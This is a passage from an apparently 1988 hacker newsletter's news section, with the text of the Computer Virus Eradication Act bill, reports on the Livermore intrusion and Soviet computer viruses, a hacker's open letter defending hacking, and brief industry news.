Mr. Carr) introduced the following bill; which was referred to the Committee on the Judiciary A BILL To ammend title 18, United States Code, to provide penalties for persons interfering with the operations of computers through the use of programs containing hidden commands that can cause harm, and for other purposes. - - - Be it enacted by the Senate and House of Representatives of the United States of America in Congress assembled, SECTION 1. SHORT TITLE. This Act may be cited as the "Computer Virus Eradication Act of 1988". SECTION 2. TITLE 18 AMENDMENT. (A) IN GENERAL.- Chapter 65 (relating to malicious mischief) of title 18, United States Code, is amended by adding at the end the following: S 1368. Disseminating computer viruses and other harmful computer programs (a) Whoever knowingly -- (1) inserts into a program for a computer information or commands, knowing or having reason to believe that such information or commands will cause loss to users of a computer on which such program is run or to those who rely on information processed on such computer; and (2) provides such a program to others in circumstances in which those others do not know of the insertion or its effects; or attempts to do so, shall if any such conduct affects interstate or foreign commerce, be fined under this title or imprisoned not more than 10 years, or both. (b) Whoever suffers loss by reason of a violation of subsection (a) may, in a civil action against the violator, obtain appropriate relief. In a civil action under this section, the court may award to the prevailing party a reasonable attorney's fee and other litigation expenses. (B) CLERICAL AMENDMENT.- The table of sections at the begining of chapter 65 of title 18, United States Code, is amended by adding at the end the following: S 1368. Disseminating computer viruses and other harmful computer programs. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - NOTE: The above text was typed in by hand from a printed copy of HR5 061. There is a possibility that there may be typographical errors which could affect the nature of the bill. For an official copy of the bill, please contact: Mr. Doug Riggs 1108 Longworth Bldg Washington D.C. 20515 Information Presented by Don Alvarez of the MIT Center For Space Research _______________________________________________________________________________ Virus Conference In Arlington, Virginia December 5, 1988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Entitled "Preventing and Containing Computer Virus Attacks", it takes place January 30-31, in Arlington, VA. Speakers include Representative Wally Herger (R-CA), a special agent from the FBI, John Landry (ADAPSO virus committee chairman), Patricia Sission from NASA, as well as a collection of attorneys and business folk. The conference is chaired by Dave Douglass, no information provided. It supposedly costs $695. The address provided is: United Communications Group 4550 Montgomery Avenue Suite 700N Bethesda, MD 20814-3382 Information Provided By Gregg Tehennepe _______________________________________________________________________________ New York Times Reviews Novel About Computer Sabotage December 7, 1988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The Sunday, December 4, 1988 issue of the New York Times Book Review (their Christmas Books issue) prominently reviews a new novel, 'Trapdoor,' by Bernard J. O'Keefe. The premise (from the review by Newgate Callender, NYT's crime fiction reviewer): "A brilliant American woman of Lebanese descent has developed the computer code that controls the operation of all our nuclear devices. Turned down for the job she has sought, convinced male chauvinism is the reason, she is ripe to be conned by a Lebanese activist. At his suggestion she inserts a virus into the computer system that in a short time will render the entire American nuclear arsenal useless. ... The Lebanese President ... demands that Israel withdraw from the West Bank, or else he will tell the Russians that the United States will lie helpless for a week or so." Callender's review begins with the lead sentence, "November 2, 1988, was the day computers in American went mad, thanks to the 'virus' program inserted by the now-famous, fun-loving Robert T. Morris, Jr." Some background on the author, also from the review: "Bernard J. O'Keefe (is) chairman of the high-tech company EG&G and of an international task force on nuclear terrorism ... (and is) the author of a nonfiction book called 'Nuclear Hostages.' O'Keefe says, "I wrote this parable to point out the complexity of modern technology and to demonstrate how one error, one misjudgment, or one act of sabotage could lead to actions that would annihilate civilization."" Callender also says "...the execution is less brilliant than the idea. The book has the usual flashbacks, the usual stereotyped characters, the usual stiff dialogue." Although the reviewer doesn't say so, the premise of this novel is quite similar to a 1985 French thriller, published in the U.S. as 'Softwar.' That novel was also based on the idea that a nation's arsenal could be completely disabled from a single point of sabotage, although in 'Softwar' it was the Soviet Union on the receiving end. Popular reviewers of both books apparently find nothing implausible in the premise. _______________________________________________________________________________ Hacker Enters U.S. Lab's Computers December 10, 1988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Thomas H. Maugh II (Los Angeles Times Service) A computer hacker has entered computers at the government's Lawrence Livermore Laboratory in the San Francisco Bay area eight times since last Saturday, but has not caused any damage and has not been able to enter computers that contain classified information, Livermore officials said Friday. [Do they ever admit to anyone gaining access to classified data? -KL] Nuclear weapons and the Star Wars defense system are designed at Livermore, but information about those projects is kept in supercomputers that are physically and electronically separate from other computers at the laboratory. The hacker, whose identitiy remains unknown, entered the non-classified computer system at Livermore through Internet, a nationwide computer network that was shut down at the beginning of November by a computer virus. Chuck Cole, Livermore's chief of security, said the two incidents apparently are unrelated. The hacker entered the computers through an operating system and then through a conventional telephone line, he gave himself "super-user" status, providing access to virtually all functions of the non-classified computer systems. Officials quickly limited the super-user access, although they left some computers vulnerable to entry in the hope of catching the intruder. "There has been no maliciousness so far," Cole said. "He could have destroyed data, but he didn't. He just looks through data files, operating records, and password files...It seems to be someone doing a joy-riding thing." _______________________________________________________________________________ Shattering Revelations December 11, 1988 ~~~~~~~~~~~~~~~~~~~~~~ Taken from the RISKS Digest (Edited for this presentation) [Shatter is a hacker based in England, he is currently accused of breaking into computers at Massachusetts Institute of Technology. -KL] (In this article, "IT" seems to refer to the computer community as a whole -KL) Some of you may have already heard of me via articles in the Wall Street Journal, New York Times, etc, but for those of you who do not have access to copies of these newspapers I am a hacker of over 10 years activity who is based near Nottingham, England [Rumored to be a false statement]. My specialities are the various packet switched networks around the world such as PSS, Telepac, Transpac, etc with various forays into UNIX, NOS/VE VMS, VM/SP, CMS, etc. I feel that as a hacker with so much activity and expirience I am qualified to make the following points on behalf of the whole hacking community. Hackers are not the vandals and common criminals you all think we are in fact most of the "TRUE" hackers around have a genuine respect and love for all forms of computers and the data that they contain. We are as a community very responsible and dedicated to the whole idea of IT, but we also have a strong dislike to the abuse of IT that is perpetrated by various governments and organizations either directly or indirectly. There is of course a small minority of so called hackers who do cause trouble and crash systems or steal money, but these people on the whole are dealt with by other hackers in a way that most of you could not even think of and most never repeat their "crimes" again. The term "HACKER" is still one to be very proud of and I am sure that in days past, anyone with a computer was called a hacker and they were very proud of the fact that someone felt that you had a great technical expertise that warrented the use of the term. However, all of the accusers out there now suffer from the standard problem that nearly all people involved within IT have and that is non-communication. You never pass on the information that you pick up and teach to others within IT [American Government organizations and Educational Institutes are among the greatest offenders] and this allows the hacking community [who do communicate] to be at least one step ahead of the system administrators when it comes to finding security problems and finding the cause and solution for the problem. A case in point is the recent Arpanet Worm and the FTP bug. Both these problems have been known for many months if not years but, when talking to various system administrators recently, not one of them had been informed about them and this left their systems wide open even though they had done all they could to secure them with the information they had. An interesting piece of information is that hackers in England knew about Morris's Worm at least 12 hours before it became public knowledge and although England was not able to be infected due to the hardware in use, we were able to inform the relevent people and patrol Internet to Janet gateways to look for any occurance of the Worm and therefore we performed a valuble service to the computing community in England -- although we did not get any thanks or acknowledgement for this service. Hackers should be nurtured and helped to perform what they consider a hobby. Some people may do crosswords for intelectual challenge -- I study computers and learn about how things interact together to function correctly (or incorrectly as the case may be). The use of a group of hackers can perform a valuable service and find problems that most of you could not even start to think of or would even have the inclination to look for. So please don't treat us like lepers and paupers. Find yourself a "TAME" hacker and show him the respect he deserves. He will perform a valuble service for you. Above all COMMUNICATE with each other don't keep information to yourselves. Bst Rgrds Shatter _______________________________________________________________________________ IBM Sells Rolm To Siemens AG December 14, 1988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ International Business Machines Corp. (IBM) announced on Tuesday that it was selling its Rolm telephone equipment subsidiary to West Germany's Siemens AG. Rolm has lost several hundred million dollars since IBM bought it in 1984 for $1.5 billion. Rolm was the first, or one of the first companies to market digital PBX systems. As most telecom hobbyists already know, the PBX market has been very soft for years. It has suffered from little or no growth and very bitter price competition. Siemens, a leading PBX supplier in Europe wants to bolster its sales in the United States, and believes it can do so by aquiring Rolm's sales and service operations. Quite obviously, it will also gain access to some of the lucrative IBM customers in Europe. Rolm was an early leader in digital PBX's, but they were surpassed in 1984 by AT&T and Northern Telecom Ltd. of Canada. Part of the strategy behind IBM's purchase of Rolm was IBM's belief that small personal computers would be linked through digital PBX's. Although this has happened, most businesses seem to prefer ethernet arrangements; something neither IBM or Rolm had given much thought to. IBM was certain the late 1980's would see office computers everywhere hooked up through PBX's. IBM made a mistake, and at a recent press conference they admitted it and announced that Rolm was going bye-bye, as part of the corporate restructuring which has seen IBM divest itself of numerous non-computer related businesses in the past several months. From its beginning until 1984, Rolm could not run itself very well; now IBM has washed its corporate hands. Time will tell how much luck the Europeans have with it. Information Contributed by Patrick Townson _______________________________________________________________________________ Virus Invades The Soviet Union December 19, 1988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ >From The San Francisco Chronicle (P. A16) (UPI) - The Soviet Union announced on Decemeber 18, 1988 that that so-called computer viruses have invaded systems in at least five government-run institutions since August, but Soviet scientists say they have developed a way to detect known viruses and prevent serious damage. In August 1988, a virus infected 80 computers at the Soviet Academy of Sciences before it was brought under control 18 hours later. It was traced to a group of Soviet and foreign schoolchildren attending the Institute's summer computer studies program, apparently resulting from the copying of game programs. Sergei Abramov of the Soviet Academy of Sciences claims they have developed a protective system, PC-shield, that protects Soviet computers against known virus strains. It has been tested on IBM computers in the Soviet Union. "This protective system has no counterpart in the world," he said (although the details remain a state secret). _______________________________________________________________________________ Phrack World News Quicknotes Issue XXII ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1. Rumor has it that the infamous John Draper aka Captain Crunch is currently running loose on the UUCP network. Recently, it has been said that he has opened up some sort of information gateway to Russia, for reasons unknown. ------------------------------------------------------------------------------- 2. Information Available For A Price ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ A company called Credit Checker and Nationwide SS says that anyone can; o Take a lot of risk out of doing business. o Check the credit of anyone, anywhere in the United States o Pull Automobile Drivers License information from 49 states o Trace people by their Social Security Number By "Using ANY computer with a modem!" To subscribe to this unique 24-hour on-line network call 1-800-255-6643. Can your next door neighbor really afford that new BMW ? ------------------------------------------------------------------------------- 3. Reagan Signs Hearing-Aid Compatibility Bill ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ There is new legislation recently passed which requires all new phones to be compatible with hearing aids by next August. The law requires a small device to be included in new phones to eliminate the loud squeal that wearers of hearing aids with telecoils pick up when using certain phones. Importers are not exempted from the law. Cellular phones and those manufactured for export are exempt. _______________________________________________________________________________ =========================================================================


E-Mail Fredric L. Rice / The Skeptic Tank